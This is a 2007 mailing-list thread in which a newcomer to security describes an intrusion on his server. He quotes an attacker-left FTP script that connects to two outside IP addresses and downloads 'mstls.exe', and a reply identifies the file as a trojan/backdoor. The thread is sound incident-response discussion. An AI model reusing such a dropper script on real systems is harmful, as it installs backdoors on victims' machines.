Security Basics mailing list archives
Re: what next
From: Justin <winopride () gmail com>
Date: Tue, 06 Feb 2007 08:18:30 -0700
nemanja.janic () centroproizvod co yu wrote:
Hello list, i wasn't sure where to post this, and since i'm just starting out in security, i figured that this is the place. Here goes: i've had a fine unknown gentleman enter at his will to my server; among other things he left behind a file named tt (no extension) which contained the following lines:open 80.93.223.22 14547 user 1 1 get mstls.exe quit open 80.71.219.134 5191 user 1 1 get mstls.exe quitI figure this is some script to be used with ftp, or at least i think so. I did tracert to those adresses, but that's where i'm stuck. What can i do next? And any idea what that mstls.exe is? I deleted it, but it was 0 bytes in size. Thanx in advance.
http://www.greatis.com/appdata/d/m/mstls.exe.htm -- Trojan/Backdoor The file is an FTP script to StnyFtpd (for the ip address: 80.93.223.22). Goodluck -Justin
Current thread:
- what next nemanja . janic (Feb 06)
- Re: what next Justin (Feb 06)
- RE: what next Murda Mcloud (Feb 07)
- RE: what next Devin Rambo (Feb 07)
- RE: what next Roger A. Grimes (Feb 07)
- Re: what next jhori (Feb 07)
- Re: what next etropos (Feb 07)
- <Possible follow-ups>
- Re: what next hackman (Feb 06)
- Re: what next RunandHide (Feb 06)
- Re: RE: what next nemanja . janic (Feb 07)
- Re: Re: RE: what next nemanja . janic (Feb 12)
- Re: what next Justin (Feb 06)